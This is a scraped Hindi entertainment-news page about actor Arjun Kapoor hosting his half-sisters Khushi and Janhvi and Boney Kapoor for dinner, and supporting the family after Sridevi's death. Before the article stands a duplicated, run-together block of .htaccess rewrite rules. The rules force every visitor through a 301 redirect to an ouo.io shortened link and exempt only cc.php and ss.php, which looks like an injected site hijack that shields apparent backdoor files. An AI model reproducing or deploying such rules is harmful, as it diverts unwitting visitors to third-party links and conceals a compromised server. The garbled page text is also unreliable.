
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 282
Previous Nextमुंबई। बॉलीवुड एक्टर अर्जुन कपूर दिल से काफी नर्म मिजाज हैं। खासकर श्रीदेवी के जाने के बाद से उनका ये साइड कुछ ज्यादा सामने आया है। अब खबर है कि हाल ही में उन्होंने अपनी बहनों खुशी और जाह्नवी को अपने घर डिनर पर बुलाया था। अर्जुन के बुलावे पर बोनी कपूर शुक्रवार को अपनी दोनों बेटियों के साथ अर्जुन के घर पहुंचे।
इस फैमिली डिनर से पहले अर्जुन पंजाब में अपनी फिल्म 'नमस्ते इंग्लैंड' की शूटिंग कर रहे थे। जैसे ही वह घर वापस लौटे तो उन्होंने बोनी और खुशी-जाह्नवी को घर बुलाने की सोची। बता दें कि बोनी कपूर के इस मुश्किल वक्त में अर्जुन हर समय उनके साथ खड़े नजर आए। श्रीदेवी के पार्थिव शरीर को भारत लाने में पेंच फंस रहा था तो अर्जुन दुबई पहुंच गए थे। वहां उन्होंने सारी प्रक्रिया के साथ-साथ गम में डूबे बोनी कपूर को भी संभाला। मुंबई में अर्जुन की बहन अंशुला भी बड़ी बहन की तरह खुशी और जाह्नवी के साथ थीं। श्रीदेवी की अंतिम यात्रा में अर्जुन उनके पार्थिव शरीर के साथ ट्रक में मौजूद थे। इस पूरे काम में अर्जुन के बर्ताव ने उनके संस्कार दिखाए। मां को खोने का गम महसूस कर चुके अर्जुन और अंशुला खुशी और जाह्नवी के लिए एक सपोर्ट सिस्टम की तरह आगे आए हैं।